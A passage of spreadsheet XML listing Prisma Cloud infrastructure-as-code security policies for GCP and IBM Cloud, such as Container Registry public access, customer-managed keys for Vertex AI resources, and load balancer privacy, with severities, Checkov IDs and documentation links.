      <c r="X997" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled</t>
        </is>
      </c>
      <c r="Y997" t="inlineStr"/>
      <c r="Z997" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_storage_bucket"]}</t>
        </is>
      </c>
      <c r="AA997" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB997" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC997" t="inlineStr">
        <is>
          <t>CKV_GCP_78</t>
        </is>
      </c>
      <c r="AD997" t="b">
        <v>1</v>
      </c>
      <c r="AE997" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF997" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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7" t="inlineStr">
        <is>
          <t>5891ec5e-06a3-4aed-acc7-f23548b8dd5e</t>
        </is>
      </c>
      <c r="AI997" t="inlineStr"/>
      <c r="AJ997" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK997" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B998" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C998" s="2" t="inlineStr"/>
      <c r="D998" t="inlineStr"/>
      <c r="E998" t="inlineStr"/>
      <c r="F998" t="inlineStr"/>
      <c r="G998" t="b">
        <v>1</v>
      </c>
      <c r="H9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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J998" t="inlineStr">
        <is>
          <t>IaC:General:google-storage</t>
        </is>
      </c>
      <c r="K998" t="inlineStr">
        <is>
          <t>GCP Container Registry repositories are anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="L998" t="inlineStr"/>
      <c r="M998" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N998" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O998" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P998" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q998" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R998" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S998" t="inlineStr"/>
      <c r="T998" t="b">
        <v>0</v>
      </c>
      <c r="U998" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V998" t="inlineStr">
        <is>
          <t>IaC:General:google-storage-bucket-iam-member,google-storage-bucket-iam-binding,google-container-registry</t>
        </is>
      </c>
      <c r="W998" t="inlineStr">
        <is>
          <t>Ensure that Container Registry repositories are not anonymously or publicly accessible</t>
        </is>
      </c>
      <c r="X998" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-public-policies/ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible</t>
        </is>
      </c>
      <c r="Y998" t="inlineStr"/>
      <c r="Z998" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_storage_bucket_iam_member", "google_storage_bucket_iam_binding", "google_container_registry"]}</t>
        </is>
      </c>
      <c r="AA998" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB998" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC998" t="inlineStr">
        <is>
          <t>CKV2_GCP_9</t>
        </is>
      </c>
      <c r="AD998" t="b">
        <v>1</v>
      </c>
      <c r="AE998" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF998" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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8" t="inlineStr">
        <is>
          <t>027a2049-cb36-4d7a-aea7-2a8e6e84aeae</t>
        </is>
      </c>
      <c r="AI998" t="inlineStr"/>
      <c r="AJ998" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK998" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" t="inlineStr"/>
      <c r="B999" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C999" s="2" t="inlineStr"/>
      <c r="D999" t="inlineStr"/>
      <c r="E999" t="inlineStr"/>
      <c r="F999" t="inlineStr"/>
      <c r="G999" t="b">
        <v>1</v>
      </c>
      <c r="H9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999" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J999" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex</t>
        </is>
      </c>
      <c r="K999" t="inlineStr">
        <is>
          <t>GCP Vertex AI datasets do not use a Customer Manager Key (CMK)</t>
        </is>
      </c>
      <c r="L999" t="inlineStr"/>
      <c r="M999" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N999" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O999" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P999" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q999" t="inlineStr"/>
      <c r="R999" t="inlineStr"/>
      <c r="S999" t="inlineStr"/>
      <c r="T999" t="b">
        <v>0</v>
      </c>
      <c r="U999" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V999" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex-ai-dataset</t>
        </is>
      </c>
      <c r="W999" t="inlineStr">
        <is>
          <t>Ensure Vertex AI datasets uses a CMK (Customer Manager Key)</t>
        </is>
      </c>
      <c r="X999" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk</t>
        </is>
      </c>
      <c r="Y999" t="inlineStr"/>
      <c r="Z999" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_vertex_ai_dataset"]}</t>
        </is>
      </c>
      <c r="AA999" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB999" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC999" t="inlineStr">
        <is>
          <t>CKV_GCP_92</t>
        </is>
      </c>
      <c r="AD999" t="b">
        <v>1</v>
      </c>
      <c r="AE999" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF999" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG9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999" t="inlineStr">
        <is>
          <t>891139f5-760f-4ed7-8718-278fe9b90798</t>
        </is>
      </c>
      <c r="AI999" t="inlineStr"/>
      <c r="AJ999" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK999" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" t="inlineStr"/>
      <c r="B1000" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1000" s="2" t="inlineStr"/>
      <c r="D1000" t="inlineStr"/>
      <c r="E1000" t="inlineStr"/>
      <c r="F1000" t="inlineStr"/>
      <c r="G1000" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1000" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex</t>
        </is>
      </c>
      <c r="K1000" t="inlineStr">
        <is>
          <t>Vertex AI endpoint is not using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L1000" t="inlineStr"/>
      <c r="M1000" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1000" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1000" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1000" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1000" t="inlineStr"/>
      <c r="R1000" t="inlineStr"/>
      <c r="S1000" t="inlineStr"/>
      <c r="T1000" t="b">
        <v>0</v>
      </c>
      <c r="U1000" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1000" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex-ai-endpoint</t>
        </is>
      </c>
      <c r="W1000" t="inlineStr">
        <is>
          <t>Ensure Vertex AI endpoint uses a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X1000" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-24</t>
        </is>
      </c>
      <c r="Y1000" t="inlineStr"/>
      <c r="Z1000" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_vertex_ai_endpoint"]}</t>
        </is>
      </c>
      <c r="AA1000" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1000" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1000" t="inlineStr">
        <is>
          <t>CKV2_GCP_24</t>
        </is>
      </c>
      <c r="AD1000" t="b">
        <v>1</v>
      </c>
      <c r="AE1000" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1000" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>3f6940f3-6be4-4439-9991-16b96d801b05</t>
        </is>
      </c>
      <c r="AI1000" t="inlineStr"/>
      <c r="AJ1000" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1000" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" t="inlineStr"/>
      <c r="B1001" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1001" s="2" t="inlineStr"/>
      <c r="D1001" t="inlineStr"/>
      <c r="E1001" t="inlineStr"/>
      <c r="F1001" t="inlineStr"/>
      <c r="G1001" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1001" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex</t>
        </is>
      </c>
      <c r="K1001" t="inlineStr">
        <is>
          <t>Vertex AI featurestore is not configured to use a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L1001" t="inlineStr"/>
      <c r="M1001" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1001" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1001" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1001" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1001" t="inlineStr"/>
      <c r="R1001" t="inlineStr"/>
      <c r="S1001" t="inlineStr"/>
      <c r="T1001" t="b">
        <v>0</v>
      </c>
      <c r="U1001" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1001" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex-ai-featurestore</t>
        </is>
      </c>
      <c r="W1001" t="inlineStr">
        <is>
          <t>Ensure Vertex AI featurestore uses a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X1001" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-25</t>
        </is>
      </c>
      <c r="Y1001" t="inlineStr"/>
      <c r="Z1001" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_vertex_ai_featurestore"]}</t>
        </is>
      </c>
      <c r="AA1001" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1001" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1001" t="inlineStr">
        <is>
          <t>CKV2_GCP_25</t>
        </is>
      </c>
      <c r="AD1001" t="b">
        <v>1</v>
      </c>
      <c r="AE1001" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1001" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>3cff6b96-75c5-4f68-85bb-169a62971ca6</t>
        </is>
      </c>
      <c r="AI1001" t="inlineStr"/>
      <c r="AJ1001" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1001" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" t="inlineStr"/>
      <c r="B1002" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1002" s="2" t="inlineStr"/>
      <c r="D1002" t="inlineStr"/>
      <c r="E1002" t="inlineStr"/>
      <c r="F1002" t="inlineStr"/>
      <c r="G1002" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1002" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex</t>
        </is>
      </c>
      <c r="K1002" t="inlineStr">
        <is>
          <t>GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK)</t>
        </is>
      </c>
      <c r="L1002" t="inlineStr"/>
      <c r="M1002" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1002" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1002" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1002" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1002" t="inlineStr"/>
      <c r="R1002" t="inlineStr"/>
      <c r="S1002" t="inlineStr"/>
      <c r="T1002" t="b">
        <v>0</v>
      </c>
      <c r="U1002" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1002" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex-ai-metadata-store</t>
        </is>
      </c>
      <c r="W1002" t="inlineStr">
        <is>
          <t>Ensure Vertex AI Metadata Store uses a CMK (Customer Manager Key)</t>
        </is>
      </c>
      <c r="X1002" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk</t>
        </is>
      </c>
      <c r="Y1002" t="inlineStr"/>
      <c r="Z1002" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_vertex_ai_metadata_store"]}</t>
        </is>
      </c>
      <c r="AA1002" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1002" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1002" t="inlineStr">
        <is>
          <t>CKV_GCP_96</t>
        </is>
      </c>
      <c r="AD1002" t="b">
        <v>1</v>
      </c>
      <c r="AE1002" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1002" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>c50376d2-9539-4696-b018-2a12cbf3bb34</t>
        </is>
      </c>
      <c r="AI1002" t="inlineStr"/>
      <c r="AJ1002" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1002" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" t="inlineStr"/>
      <c r="B1003" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1003" s="2" t="inlineStr"/>
      <c r="D1003" t="inlineStr"/>
      <c r="E1003" t="inlineStr"/>
      <c r="F1003" t="inlineStr"/>
      <c r="G1003" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1003" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex</t>
        </is>
      </c>
      <c r="K1003" t="inlineStr">
        <is>
          <t>Vertex AI tensorboard does not use a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L1003" t="inlineStr"/>
      <c r="M1003" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1003" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1003" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1003" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1003" t="inlineStr"/>
      <c r="R1003" t="inlineStr"/>
      <c r="S1003" t="inlineStr"/>
      <c r="T1003" t="b">
        <v>0</v>
      </c>
      <c r="U1003" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1003" t="inlineStr">
        <is>
          <t>IaC:General:google-vertex-ai-tensorboard</t>
        </is>
      </c>
      <c r="W1003" t="inlineStr">
        <is>
          <t>Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X1003" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-26</t>
        </is>
      </c>
      <c r="Y1003" t="inlineStr"/>
      <c r="Z1003" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_vertex_ai_tensorboard"]}</t>
        </is>
      </c>
      <c r="AA1003" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1003" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1003" t="inlineStr">
        <is>
          <t>CKV2_GCP_26</t>
        </is>
      </c>
      <c r="AD1003" t="b">
        <v>1</v>
      </c>
      <c r="AE1003" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1003" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>ea638a4b-d99b-4799-aa1d-e110cdbaff73</t>
        </is>
      </c>
      <c r="AI1003" t="inlineStr"/>
      <c r="AJ1003" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1003" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" t="inlineStr"/>
      <c r="B1004" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1004" s="2" t="inlineStr"/>
      <c r="D1004" t="inlineStr"/>
      <c r="E1004" t="inlineStr"/>
      <c r="F1004" t="inlineStr"/>
      <c r="G1004" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1004" t="inlineStr">
        <is>
          <t>IaC:General:google-workbench</t>
        </is>
      </c>
      <c r="K1004" t="inlineStr">
        <is>
          <t>Vertex AI workbench instances are not private</t>
        </is>
      </c>
      <c r="L1004" t="inlineStr"/>
      <c r="M1004" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1004" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1004" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1004" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1004" t="inlineStr"/>
      <c r="R1004" t="inlineStr"/>
      <c r="S1004" t="inlineStr"/>
      <c r="T1004" t="b">
        <v>0</v>
      </c>
      <c r="U1004" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1004" t="inlineStr">
        <is>
          <t>IaC:General:google-workbench-instance</t>
        </is>
      </c>
      <c r="W1004" t="inlineStr">
        <is>
          <t>Ensure Vertex AI workbench instances are private</t>
        </is>
      </c>
      <c r="X1004" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-28</t>
        </is>
      </c>
      <c r="Y1004" t="inlineStr"/>
      <c r="Z1004" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_workbench_instance"]}</t>
        </is>
      </c>
      <c r="AA1004" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1004" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1004" t="inlineStr">
        <is>
          <t>CKV2_GCP_28</t>
        </is>
      </c>
      <c r="AD1004" t="b">
        <v>1</v>
      </c>
      <c r="AE1004" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1004" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>19c51087-64e6-4d07-a6e6-1ced6a1f9586</t>
        </is>
      </c>
      <c r="AI1004" t="inlineStr"/>
      <c r="AJ1004" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1004" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" t="inlineStr"/>
      <c r="B1005" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1005" s="2" t="inlineStr"/>
      <c r="D1005" t="inlineStr"/>
      <c r="E1005" t="inlineStr"/>
      <c r="F1005" t="inlineStr"/>
      <c r="G1005" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1005" t="inlineStr">
        <is>
          <t>IaC:General:google-workbench</t>
        </is>
      </c>
      <c r="K1005" t="inlineStr">
        <is>
          <t>Vertex AI workbench instance disks not encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L1005" t="inlineStr"/>
      <c r="M1005" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1005" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1005" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1005" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1005" t="inlineStr"/>
      <c r="R1005" t="inlineStr"/>
      <c r="S1005" t="inlineStr"/>
      <c r="T1005" t="b">
        <v>0</v>
      </c>
      <c r="U1005" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1005" t="inlineStr">
        <is>
          <t>IaC:General:google-workbench-instance</t>
        </is>
      </c>
      <c r="W1005" t="inlineStr">
        <is>
          <t>Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="X1005" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-google-cloud-2-27</t>
        </is>
      </c>
      <c r="Y1005" t="inlineStr"/>
      <c r="Z1005" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["google_workbench_instance"]}</t>
        </is>
      </c>
      <c r="AA1005" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1005" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1005" t="inlineStr">
        <is>
          <t>CKV2_GCP_27</t>
        </is>
      </c>
      <c r="AD1005" t="b">
        <v>1</v>
      </c>
      <c r="AE1005" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1005" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>ea79c555-1233-4abf-be24-ccaedafe1db2</t>
        </is>
      </c>
      <c r="AI1005" t="inlineStr"/>
      <c r="AJ1005" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1005" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" t="inlineStr"/>
      <c r="B1006" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1006" s="2" t="inlineStr"/>
      <c r="D1006" t="inlineStr"/>
      <c r="E1006" t="inlineStr"/>
      <c r="F1006" t="inlineStr"/>
      <c r="G1006" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1006" t="inlineStr">
        <is>
          <t>IaC:General:ibm-is</t>
        </is>
      </c>
      <c r="K1006" t="inlineStr">
        <is>
          <t>IBM Cloud Application Load Balancer for VPC has public access enabled in Terraform</t>
        </is>
      </c>
      <c r="L1006" t="inlineStr"/>
      <c r="M1006" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1006" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1006" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1006" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1006" t="inlineStr"/>
      <c r="R1006" t="inlineStr"/>
      <c r="S1006" t="inlineStr"/>
      <c r="T1006" t="b">
        <v>0</v>
      </c>
      <c r="U1006" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1006" t="inlineStr">
        <is>
          <t>IaC:General:ibm-is-lb</t>
        </is>
      </c>
      <c r="W1006" t="inlineStr">
        <is>
          <t>Ensure load balancer for VPC is private (disable public access)</t>
        </is>
      </c>
      <c r="X1006" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ibm-policies/ibm-general-policies/bc-ibm-2-1</t>
        </is>
      </c>
      <c r="Y1006" t="inlineStr"/>
      <c r="Z1006" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["ibm_is_lb"]}</t>
        </is>
      </c>
      <c r="AA1006" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1006" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1006" t="inlineStr">
        <is>
          <t>CKV2_IBM_1</t>
        </is>
      </c>
      <c r="AD1006" t="b">
        <v>1</v>
      </c>
      <c r="AE1006" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1006" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>636c1197-e12f-462e-9e0e-c6f9dcee8266</t>
        </is>
      </c>
      <c r="AI1006" t="inlineStr"/>
      <c r="AJ1006" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1006" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" t="inlineStr"/>
      <c r="B1007" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1007" s="2" t="inlineStr"/>
      <c r="D1007" t="inlineStr"/>
      <c r="E1007" t="inlineStr"/>
      <c r="F1007" t="inlineStr"/>
      <c r="G1007" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1007" t="inlineStr">
        <is>
          <t>IaC:General:ibm-is</t>
        </is>
      </c>
      <c r="K1007" t="inlineStr">
        <is>
          <t>IBM Cloud Virtual Private Cloud (VPC) classic access is enabled in Terraform</t>
        </is>
      </c>
      <c r="L1007" t="inlineStr"/>
      <c r="M1007" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1007" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1007" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1007" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1007" t="inlineStr"/>
      <c r="R1007" t="inlineStr"/>
      <c r="S1007" t="inlineStr"/>
      <c r="T1007" t="b">
        <v>0</v>
      </c>
      <c r="U1007" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1007" t="inlineStr">
        <is>
          <t>IaC:General:ibm-is-vpc</t>
        </is>
      </c>
